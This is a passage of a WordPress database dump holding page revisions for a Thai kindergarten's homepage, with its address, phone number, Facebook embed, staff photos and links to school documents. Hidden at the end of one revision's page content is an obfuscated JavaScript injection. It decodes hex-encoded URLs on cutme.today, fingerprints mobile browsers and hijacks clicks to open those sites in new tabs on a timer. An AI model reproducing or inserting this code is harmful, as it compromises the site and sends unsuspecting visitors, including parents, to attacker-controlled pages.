{\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 11:47:35','2024-09-24 04:47:35','',19,'http://watprato.ssk.in.th/?p=436',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(438,2,'2024-09-24 11:49:16','2024-09-24 04:49:16','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} 